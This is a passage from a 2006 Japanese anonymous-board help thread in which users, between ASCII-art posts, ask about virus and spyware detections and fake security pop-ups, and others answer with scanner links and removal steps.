                  ,,.r'' ゛~~` ''ッ,,   >>21>>46ノウイルスニカンセン
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.    シタンダヨ!       ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
62名無しさん@お腹いっぱい。:2006/11/16(木) 05:04:38
落差がすごいな。>>21>>46
63名無しさん@お腹いっぱい。:2006/11/16(木) 05:16:33
                  ,,.r'' ゛~~` ''ッ,,   Peaceキレタ
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.  7イッテクル     ,.、
                 ミ   ミ゛,へ.__, ,_ノヽ i.    マタクル      .| |l
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,    、 〃   ミ
     :i;     .i:   w      !!   ミ!:   ミ ミ  ミ
     :i;  /   i:      !!       .ミ キ    , ミ
     :il     .i:    !    w!    ミ .:i.   _ , ミ
    :il   !  i:           ! ,〃゛  キ    ゞ、 ミ
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
64名無しさん@お腹いっぱい。:2006/11/16(木) 06:20:59
違法ダウソ物のフォトショとイラレを見つけたんだが
ウイルスチェックしたいんですがフリーのダウソ済みファイルのウイルスチェックソフト
教えて下さい!!
65名無しさん@お腹いっぱい。:2006/11/16(木) 06:24:06
                   ,,.r'' ゛~~` ''ッ,, ジュウヨウナコトハ
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.  ナイザイテキシンリヲ ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.  キョゼツシナイコト   .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
66名無しさん@お腹いっぱい。:2006/11/16(木) 06:25:38
                   ,,.r'' ゛~~` ''ッ,, ドウトクヤ リンリヲトキタガルヤツハ
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.  キョゼツシガチナ ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.  リソウシュギシャ   .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
67名無しさん@お腹いっぱい。:2006/11/16(木) 08:24:26
>>64
つ違法ダウソ物
68名無しさん@お腹いっぱい。:2006/11/16(木) 08:56:08
>>64
通報しますた(・∀・)
69名無しさん@お腹いっぱい。:2006/11/16(木) 16:38:13
どうでもいい事だが・・・
Vistaへの乗り換えに自信のないあなたに、自信を持ってお勧めできるOS、それがFedora Core。

・サンプル画像
http://www.lynucs.org/index.php?screen_id=16160218054558aaec4d948&p=screen
http://www.lynucs.org/index.php?screen_id=12170238984554b554f0ad2&p=screen
・動画
高画質 http://stage6.divx.com/members/225743/videos/1032106
低画質 http://www.youtube.com/watch?v=ksxADo-4Q4k

FedoraというのはLinuxの一種で、日本で最も普及しているLinuxがFedora。
インストールは
http://ftp.riken.jp/Linux/fedora/core/6/i386/iso/FC-6-i386-DVD.iso
のisoをDVDに焼いてパソコンを再起動させればOK。
注意としてDVDは「イメージとしてisoを焼く」ようにしないといけない。
http://linux2ch.is.land.to/index.php?InstallCDCreationInfo が参考になるぞ
インストールの手順は
http://itpro.nikkeibp.co.jp/article/COLUMN/20061101/252399/?ST=lin-os&P=2 を見てくれ。
アドバイスだが「SELinuxの設定」は無効にしておくことをお勧めする。
ちなみにWindowsの管理者(Administrator)にあたるユーザーは、Linuxでは「root」という名前だ。
パスワードを忘れないようにな。
それとファイラーのデフォルトの設定が良くないので、「設定」->「動作」->「常にブラウザ・ウィンドウで開く」にしたほうがいい。
ゴミ箱には保存場所の記録機能がないので注意してくれ(KDEというのならある)
特許の関係で動画と音楽の再生に制限がある。もしdivxとかの再生がしたいならvlc、xine、mplayerなどソフトを自分で入れてくれ。
最後に、ソフト更新ツールが少し重くて遅いことは勘弁してくれ。
ウイルスの心配のないネット生活をエンジョイだ。

初心者質問大歓迎掲示板↓
http://pc8.2ch.net/test/read.cgi/linux/1162940232/
70MONA ◆ApRjtwCQJQ :2006/11/16(木) 22:35:33

     ∧_∧   
    ( ´∀`)  
    (    )  ボク、Berry CD使ってます
    | | |   
    (__)_)
71名無しさん@お腹いっぱい。:2006/11/17(金) 00:37:41
 ∧_∧
 ( ´∀`)
 (    )
 | | |
 (__)_)


72名無しさん@お腹いっぱい。:2006/11/17(金) 00:38:13
  ∧_∧
 ( ´∀`)
 (    )<
 | | |
 (__)_)


73名無しさん@お腹いっぱい。:2006/11/17(金) 00:38:54
     ∧_∧   
    ( ´∀`)  
    (    )<
    | | |   
    (__)_)
74名無しさん@お腹いっぱい。:2006/11/17(金) 00:39:25
テ、テスト!
75MONA ◆ApRjtwCQJQ :2006/11/17(金) 04:20:18

     ∧_∧   
    ( ´∀`)  
    (    )  面白い www
    | | |   
    (__)_)
76名無しさん@お腹いっぱい。:2006/11/17(金) 18:35:20
ビデオファイルに感染するワーム出現――McAfee
http://www.itmedia.co.jp/news/articles/0611/17/news031.html


映画などのメディアファイルに感染するワーム「W32/Realor」が出回っているとして、セキュリティソフトメーカーの米McAfeeがアラートを公開した
RealorワームはRealMediaファイルに感染し、悪質サイトにユーザーを誘導する。ビデオを使ったマルウェアは増加傾向にあるとMcAfeeは警告している。
77名無しさん@お腹いっぱい。:2006/11/17(金) 18:59:27
Realならしょうがない
78名無しさん@お腹いっぱい。:2006/11/17(金) 20:14:43
なんということだ、RealMediaふぁいるは、まだまだエロ動画サイトで現役なのだぞ。
79名無しさん@お腹いっぱい。:2006/11/17(金) 20:16:26
ソースネクストのウィルスセキュリティzeroってどうですか?
80名無しさん@お腹いっぱい。:2006/11/17(金) 20:18:36
>>79
【ソース/K7】ウイルスセキュリティZERO 6年目
ttp://pc8.2ch.net/test/read.cgi/sec/1162354584/
81名無しさん@お腹いっぱい。:2006/11/17(金) 21:22:33
>>80
ありがとう
82名無しさん@お腹いっぱい。:2006/11/17(金) 21:51:58
                                           /  , - '
                          最近              (  (
                ,,.r'' ゛~~` ''ッ,,    どーも             )   )
              、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.  ダリィんだよね     ,.、   / /
               ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
             ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
         、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
       、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
      シ  //      ミ`    l.l ヽ"、         /  ノ
     ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
     ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
    .ミ /     i:  /      `^^     \ ."   〃  ミ
   .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
   :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
   :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
   :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
  :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
  .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
  :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
  ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
     彡   〃  〃     }} /〉.〉〉〉i''"   〃
      彡、     {{     〃,__!////l |    〃
        X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
         ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
83名無しさん@お腹いっぱい。:2006/11/17(金) 22:23:22
もうすぐウィルスバスターの無料お試しが切れるのですが、
ダウンロード版を購入するとき、どうやって料金を払うのですか?
また、ダウンロード版と店頭購入版とでは、
どちらがインストールのやり方がわかりやすいですか?
当方初心者なもので宜しくお願いします。
84名無しさん@お腹いっぱい。:2006/11/17(金) 22:59:38
>>83
バスターの更新をする前に
Kaspersky Internet Security 6.0日本語版の30日無料試用版を試したほうが、きっと後悔しなくてすむよ。
ttp://www.just-kaspersky.jp/products/try/
85名無しさん@お腹いっぱい。:2006/11/17(金) 23:02:01
誰が宣伝しろといったよ?
86名無しさん@お腹いっぱい。:2006/11/17(金) 23:15:25
>>83
http://www.trendmicro.co.jp/consumer/purchase/newly/

ウイルスバスター購入お助けツール
簡単な質問にお答えいただくだけで、お客さまに最適なウイルスバスターが見つかります。ご購入をご検討中のお客さまはぜひご利用ください。

※ このツールは個人のお客さまを対象としています。
 
87名無しさん@お腹いっぱい。:2006/11/17(金) 23:22:46
>>85
うせろウンコ臭いヤシは
88名無しさん@お腹いっぱい。:2006/11/17(金) 23:59:18
>>84
ありがとう。
89名無しさん@お腹いっぱい。:2006/11/18(土) 00:00:06
>>86
ありがとう。
90名無しさん@お腹いっぱい。:2006/11/18(土) 00:09:33
91名無しさん@お腹いっぱい。:2006/11/18(土) 00:15:57
>>90
SMAPのありがとう
PC無害、精神的有害
92名無しさん@お腹いっぱい。:2006/11/18(土) 00:21:51
わろす
93名無しさん@お腹いっぱい。:2006/11/18(土) 10:12:27
【使用OS】XP
【WINDOWS UPDATE】している
【ウィルスソフト】Avast
【UPDATE】している
【スキャン】Avast+オンラインウィルスチェック(trendmicro)でしている
【症状】
Avastではウィルス反応がなかったので
オンラインウィルスチェック(trendmicro)をしたらウィルス感染していた
【やったこと】
ゲームをインストールしたらそのゲームのexeファイルが
BKDR_Genericというウィルス(バックドア型?)に感染しているといわれた
ゲーム自体は普通にできる
【とった処置】
まだなにもしていない

ゲームが普通にできるウィルスはあるのですか?
94名無しさん@お腹いっぱい。:2006/11/18(土) 10:36:59
>>93
Genericはバスターが「疑わしい」と判断したファイルに付く検出名
従って誤検知の可能性もある

とりあえずそのexe、ゲームの出所がわからん事には何とも
自力で調べる気があるなら別のオンラインスキャンか

こことか
ttp://www.virustotal.com/en/indexf.html
9593:2006/11/18(土) 10:50:10
>>94
教えていただいたURLで調べてみます。
ありがとうございました。
96名無しさん@お腹いっぱい。:2006/11/18(土) 11:32:54
>>93
多分感染してるわ
詳しくはここを参照
  ↓
http://www.transa-na.net/?news/archive/2006/10/11.jpg
97名無しさん@お腹いっぱい。:2006/11/18(土) 11:36:08
>>96
はいはい、ご苦労さん。
海外のアダルトサイトで大量のポップアップとかクッキーとか
98名無しさん@お腹いっぱい。:2006/11/18(土) 21:58:23
質問です
アドレスに「share」と書いてあるところはクリックしない方がいいでしょうか?

ttp://www.tyu2.com/
このサイトの無料で見れる動画を見たりしてるんですが
アドレスにshareと書いてあったり、無料で見れるのも何か怪しい気がするの
ですが、ココの動画はウィルスが付いてるかどうか調べてもらえないでしょうか?
スレ違いだったら申し訳ないですが。。
99名無しさん@お腹いっぱい。:2006/11/18(土) 23:25:33
>>98
>ココの動画はウィルスが付いてるかどうか調べてもらえないでしょうか?
鑑定以来ならこのあたりでどぞー

勇気がなくて踏めない人のための鑑定スレPart11
ttp://pc8.2ch.net/test/read.cgi/hack/1162991870/
100名無しさん@お腹いっぱい。:2006/11/18(土) 23:39:38
>>99
ありがとうございます!!
101名無しさん@お腹いっぱい。:2006/11/19(日) 02:14:03

( ^ω^)
102名無しさん@お腹いっぱい。:2006/11/20(月) 19:22:35
「近い将来にはコンピュータ攻撃で死者も」米McAfeeテラフィシ氏
http://internet.watch.impress.co.jp/cda/news/2006/11/20/13995.html

遅かれ早かれ、コンピュータ攻撃で死者が発生する」。米McAfeeのセキュリティ研究機関「AVERT(Anti-Virus Emergency Response Term) Labs」のディレクターを務めるジョー・テラフィシ氏が20日、
「セキュリティの未来」と題する講演を行ない、悪意のあるプログラムが医療機器や軍事兵器を狙い攻撃することで、人々の命が奪われる可能性があると語った。

「マルウェアを活用したサイバーテロは5年後には発生する」と語るテラフィシ氏は、「公共の利益を保護するためにセキュリティ研究組織が統合し、相互運用性を持つベンダー製品を提供すべき。
我々もシマンテックやトレンドマイクロなどと協力する必要がある」と話し、セキュリティ業界企業の協力を呼びかけた。
103あぼーん:あぼーん
あぼーん
104名無しさん@お腹いっぱい。:2006/11/21(火) 06:38:16
Spyware:Cookie/Go
Spyware:Cookie/Statcounter
Spyware:Cookie/Com.com
Spyware:Cookie/Rightmedia
Spyware:Cookie/MediaTickets
Spyware:Cookie/Com.com
Spyware:Cookie/Errorguard
Spyware:Cookie/64.62.232
Spyware:Cookie/360i
Spyware:Cookie/2o7
Spyware:Cookie/Com.com
Spyware:Cookie/Screensavers
Spyware:Cookie/Ccbill
Spyware:Cookie/Searchportal
Spyware:Cookie/Gaytrafficbroker
Spyware:Cookie/Toplist
Spyware:Cookie/Hbmediapro
Spyware:Cookie/Winantivirus
Spyware:Cookie/ErrorSafe
Spyware:Cookie/Outster
Spyware:Cookie/adultfriendfinder
Spyware:Cookie/ErrorSafe
Spyware:Cookie/Reliablestats
Spyware:Cookie/YieldManager
Spyware:Cookie/DriveCleaner
Spyware:Cookie/DriveCleaner
Spyware:Cookie/2o7Spyware:Cookie/Winantivirus
の30個。駆除できなかったスパイウェアなんですけど、
全部消した方が良いのでしょうか?放置しといても安全でしょうか?
(消せるかわからないんですけど)
よろしくお願いします。
105名無しさん@お腹いっぱい。:2006/11/21(火) 06:44:54
>>104
Cookieの削除
で終了
106名無しさん@お腹いっぱい。:2006/11/21(火) 07:49:16
すれ違いかどうか微妙なのだが、英文で、マイクロソフトエクスプローラの名で
「スパイウエア対策の為にウルティメイトディフェンダーをインストールしますか?」と言う
文章がしつこく提示されるのだが、これは本当にマイクロソフトの仕様なの?
それとも悪質な企業広告?
キャンセルしても消えないんですけれど
107名無しさん@お腹いっぱい。:2006/11/21(火) 07:59:00
>>106
>キャンセルしても消えないんですけれど
すでにやばいかも

カスペルスキー:オンライン ウイルス&スパイウェアスキャナで調べてみてね
ttp://www.kaspersky.co.jp/scanforvirus/
108名無しさん@お腹いっぱい。:2006/11/21(火) 08:22:01
ヤバイ?しかしこのultimate defenderと言うソフトって無料じゃないんだよね。
実際この警告自体がトラップって事無いの?
109名無しさん@お腹いっぱい。:2006/11/21(火) 08:30:59
つーか、調べたら、このultimate defender自体が悪質な偽装セキュリティ広告らしいではないか。
危ない危ない。騙されるところだった。
110名無しさん@お腹いっぱい。:2006/11/21(火) 08:47:55
>>105
ありがとうございます。今クッキー消しました!!
111名無しさん@お腹いっぱい。:2006/11/21(火) 08:56:38
>>110

( ^ω^)
112名無しさん@お腹いっぱい。:2006/11/21(火) 10:39:30
>>110
  _、_
( ,_ノ` )y━・~~~ < いいってことよ・・・
113名無しさん@お腹いっぱい。:2006/11/21(火) 11:12:57
>>107
いやなこった。
114名無しさん@お腹いっぱい。:2006/11/21(火) 12:11:07
^^+(  ω )
見事な変装ですね。全然わからん
115名無しさん@お腹いっぱい。:2006/11/21(火) 18:06:53
>>114
  _、_
( ,_ノ` )y━・~~~
116名無しさん@お腹いっぱい。:2006/11/21(火) 22:47:27
初書き込み失礼します
PCを起動したら
「危険なファイルを発見しました」の小窓
「貴方の行動はつつ抜けで…」とか表示されて
ドライブクリーナーってソフトをダウンロードして
実行しますか?
って表示されました。
わけがわからなくて不安
起動するたびに出るのですがどうすればいいのでしょうか…

117名無しさん@お腹いっぱい。:2006/11/21(火) 22:59:06
>>116
コンパネに対象ソフトがある場合:
1) 復元を無効にする
2) コンパネから削除
3) 一時ファイルとクッキーを削除
4) セーフモードでspybotとセキュリティソフトでスキャン

コンパネに対象ソフトが無い場合:
上記1.3.4を試し、改善しなければテンプレ>>1の「Trojan.Vundoの駆除」を試す

正常になれば復元を有効に戻してもいいです。

参考:
 システムの復元を無効/有効にする方法
 ttp://www.mcafee.com/japan/security/DisableSysRestore.asp
 インターネットキャッシュとクッキーの削除 − ブラウザのゴミ掃除
 ttp://www.higaitaisaku.com/icsakujyo.html
 コンピュータをセーフモードで起動する方法
 ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jdocid/20040302105202953
 Trojan.Vundoの駆除
 ttp://www.higaitaisaku.com/vundofix.html

ttp://www.higaitaisaku.com/fakewarning.html
118名無しさん@お腹いっぱい。:2006/11/21(火) 23:00:05
やめとけ。新手の詐欺だ。
ドライブクリーナーがウイルスソフト。
ググルと何か出てくるだろ。
あまり変なサイトを見て回るなよ。
119名無しさん@お腹いっぱい。:2006/11/21(火) 23:08:48
>>117
ううう…; 自分全くの初心者なのでよく分からない…orz
正直怖いです…;

>>118
そうなのですか?
はい、以後気をつけます;;
ありがとうでした^^
120名無しさん@お腹いっぱい。:2006/11/21(火) 23:59:23
121名無しさん@お腹いっぱい。:2006/11/22(水) 00:07:01
ここ壊れてますって出てワラタ
専ブラ使ってたんだって気が付いた
122名無しさん@お腹いっぱい。:2006/11/22(水) 15:40:37
なにをしたからそうなったのかわからないが
CD/DVDドライブがいかれ、外付けHDDが動かなくなり、wi-fiコネクタが認識されなくなった
HDD内には見慣れないファイルがありそれを確認したのが昨日の夜、再起動後には認識されなくなったというか
電源が入らないので確認のしようがない。CDドライブの方もコツンコツンと一定の間隔で音が鳴り読み込みができない状態に
これらはなんらかのウイルスに感染してる可能性があるのでしょうか?

【使用OS】XP
【WINDOWS UPDATE】している
【ウィルスソフト】Avast
【UPDATE】している
【スキャン】Windows Live OneCareのフルスキャン、Ad-Aware SE Personalをたまに
【とった処置】特にしていない
123名無しさん@お腹いっぱい。:2006/11/22(水) 16:44:52
>>122
それだけでは何とも・・・
別機でウィルスチェック等して試すか、ドライバ関係を一旦削除して
再起動で確認
単にHDDの電源が逝かれた場合は中身抜いて
別のストレージケースにでも放り込んで確認
124名無しさん@お腹いっぱい。:2006/11/22(水) 18:43:07
125名無しさん@お腹いっぱい。:2006/11/22(水) 22:56:17
カスペルスキーやってみたがこれって検出するだけなのか
問題になりそうなものは出てこなかったが何が原因なんだろう
126名無しさん@お腹いっぱい。:2006/11/22(水) 23:01:04
>>122
avast!
127MONA ◆ApRjtwCQJQ :2006/11/22(水) 23:12:32

     ∧_∧   
    ( ´∀`)  ハードトラブルの可能性の方が高そうですよ
    (    )  まずは、BIOSで各デバイスを認識できてるかでしょうね
    | | |   
    (__)_)
128名無しさん@お腹いっぱい。:2006/11/23(木) 15:19:07
ウィルスみたいなプログラムを起動してしまいました。その後、IEとかを起動しようとするとWindowsインストーラが繰り返し起動して、マイクロソフトオフィスを設定してますとかなるんですが、どうすればよいでしょうか?
129名無しさん@お腹いっぱい。:2006/11/23(木) 16:19:14
>>128
>ウィルスみたいなプログラム
を駆除
130名無しさん@お腹いっぱい。:2006/11/23(木) 18:25:19
TSPY_LOOK2ME.Lっていうスパイウェアがどんなものか教えて頂けませんか。
トレンドマイクロのデータベースが使いづらくて見つからないんです。
131名無しさん@お腹いっぱい。:2006/11/23(木) 18:27:43
できればトレンドマイクロのデータベースでピンポイント検索
できる方法も教えて頂けると有り難いです。
TSPY_LOOK2ME.Lと打ち込んで検索してみても
全く関係のない名前のものまで1000件以上出てきてしまうんです。
132名無しさん@お腹いっぱい。:2006/11/23(木) 19:19:30
そういうときは他社のオンラインスキャンを使ってみると解決しやすいよ

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
ttp://www.kaspersky.co.jp/scanforvirus/
133名無しさん@お腹いっぱい。:2006/11/23(木) 19:42:24
>>131
tp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FLOOK2ME%2EL
134名無しさん@お腹いっぱい。:2006/11/23(木) 19:46:01
>>132は質問者の意向を無視した回答をする無責任なオナニー野郎
135名無しさん@お腹いっぱい。:2006/11/23(木) 20:05:59
すみません。わたし女です。。。
136131:2006/11/23(木) 21:02:51
>>132
スキャンはトレンドマイクロでできたんだけど、
さっきのスパイウェアが見つかったから
どんな特徴があるのか調べてみたかったんだよ。
他にもデータベースが無いか探してみるね。

>>133
ありがとう。感染報告ゼロなんだね。
個別の具体的な特徴が知りたかったのに。
やっぱパスワードとか暗証番号盗まれたかな。不安。
137名無しさん@お腹いっぱい。:2006/11/23(木) 23:23:46
http://www.medianetjapan.com/2/20/entertainment/soko/asoko.html
ここ開いちゃったんだけどウィルスいるの?
138名無しさん@お腹いっぱい。:2006/11/23(木) 23:32:05
だれかー
139名無しさん@お腹いっぱい。:2006/11/23(木) 23:52:05
>>137
マカとDr.webでは大丈夫だよ。
140名無しさん@お腹いっぱい。:2006/11/23(木) 23:53:15
>>139
ありがとうございます!!><
141名無しさん@お腹いっぱい。:2006/11/24(金) 02:33:50
度々スイマセン。128です。
その.exeは削除して、ウィルススキャンもスパイボットも異常なしなんですが、勝手にWindowsインストーラが起動してしまいます。IEもコントロールパネルも開こうとするたびにインストーラがでてきてしまいます。どうすればいいかまったくわからなくて・・・
142名無しさん@お腹いっぱい。:2006/11/24(金) 02:46:17
143名無しさん@お腹いっぱい。:2006/11/24(金) 02:53:21
IEが起動しなくてネットに繋げないんです。メディアプレーヤーとかなら起動するんですが。ほっといても勝手にWindowsインストーラが起動しては→マイクロソフトオフィス2003を設定しています→情報を集めています→消える、を繰り返しています・・・
144名無しさん@お腹いっぱい。:2006/11/24(金) 12:31:15
質問者は>>1-8のテンプレを読んでから質問するようにしてください。
また荒らし対策のため、質問する際にはトリップをつけるようお願いします。

>>143
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
を書いてください。

何が検出されて何を削除したのかわからなければ、具体的な回答は出来ません。
正常に動作していた時の復元ポイントがあれば、そこで復元してみるのも一つの手段です。
一般的な手法として、セーフモードでアンチウイルスソフトでスキャンする方法がありますが、それは試しましたか?
もしアンチウイルスソフトを入れていないのであれば、反省をしつつクリーンインストールをお勧めします。
145名無しさん@お腹いっぱい。:2006/11/24(金) 14:55:46
【使用OS】windows2000
【WINDOWS UPDATE】SP4
【ウィルスソフト】Norton AntiVirus,Internet Security
【UPDATE】自動 最新
【スキャン】完全スキャン ウィルスなし
【症状】ムービーファイルやmp3ファイルがaviに変換されて
    Dドライブをいっぱいにする。起動後直後にされていた
    らしく、起動直後よりCPUが100%で何もできなかった。
    初めはただPCが重いだけだとおもっていたため。

【やったこと】変換されたファイルをすべて消した。その後通常である。
【とった処置】nortonで完全スキャンしたが特にウィルスらしきものは見つからなかった。

こんなウィルスの情報を教えてください。
146名無しさん@お腹いっぱい。:2006/11/24(金) 15:02:24
助けてください。
ウイルスが見つかりました。どうやらトロイの木馬らしいです。
ウイルスバスター2004を使ってます。
トレンドマイクロには
検出時の処理:感染ファイルを隔離できませんでした。
となってます。なんか10ぐらいでてきてて、
ウイルス名はTSPY LINEAGE.BDPです。
バスターかけてますが、また2個でてきました。
どうしたらいいのか教えてください。
147名無しさん@お腹いっぱい。:2006/11/24(金) 15:07:08
ケツにネギ突っ込んで寝れば直るらしいよ
148名無しさん@お腹いっぱい。:2006/11/24(金) 15:09:20
149名無しさん@お腹いっぱい。:2006/11/24(金) 15:16:31
>>148 固まって動かせない状態に…
バスター終了して6こウイルスが!
タスクマネージャが大量出現
もうどうしたもんだか
150名無しさん@お腹いっぱい。:2006/11/24(金) 15:46:53
バスターでチェックしたファイルでウィルスが検出されてそのファイルが削除されるんだけど、
その直後にカスペでチェックするとバスターのフォルダ内にさっき削除したと思われる
感染したファイル(名前・形式が変わっていてサイズが同じ)がまた検出されるんだよね。

これってバスターで削除したと思わせて実はバスターフォルダ内に感染って仕組みなのかな?
それともバスター自身がフォルダ内に移すっていう仕組みなのかな?

もしそのまま放っておいたらどうなんだろ・・・・
151名無しさん@お腹いっぱい。:2006/11/24(金) 15:48:50
隔離されてるんでしょ
152名無しさん@お腹いっぱい。:2006/11/24(金) 15:59:53
>>151
たぶんそうかなとは思ったけど、
隔離されれば他ソフトで検出されても問題ないんかな?
153名無しさん@お腹いっぱい。:2006/11/24(金) 16:08:28
>>152
当たり前だろ.....
何の為の隔離だよ.....
154名無しさん@お腹いっぱい。:2006/11/24(金) 19:21:29
あげ
155名無しさん@お腹いっぱい。:2006/11/24(金) 20:37:05
>>149
リカバリが手っ取り早い
タスクマネージャで片っ端から停止させながら
手動削除後にアンチウィルスソフト使用では?
156名無しさん@お腹いっぱい。:2006/11/24(金) 21:21:41
>>150
カスペでチェックする前にPCを再起動させてないので
削除したはずの感染ファイルが検出されてるだけ
157名無しさん@お腹いっぱい。:2006/11/24(金) 22:28:55
【使用OS】                 XP
【WINDOWS UPDATE】 SP2
【ウィルスソフト】             ノートン
【UPDATE】                してるはず
【スキャン】                最近してない
【症状】                  パソコンを立ち上げるとWindowsの読み込みが終わったあと画面が真っ暗になり
                      中心にドクロの絵が表示されて、何も操作ができなくなる。
【やったこと】               セーフモード→意味ない   セーフモードに入らずシステムの復元→意味なかった
【とった処置】              とりあえずどうしようもないので何かこの症状について情報知ってる方いたら
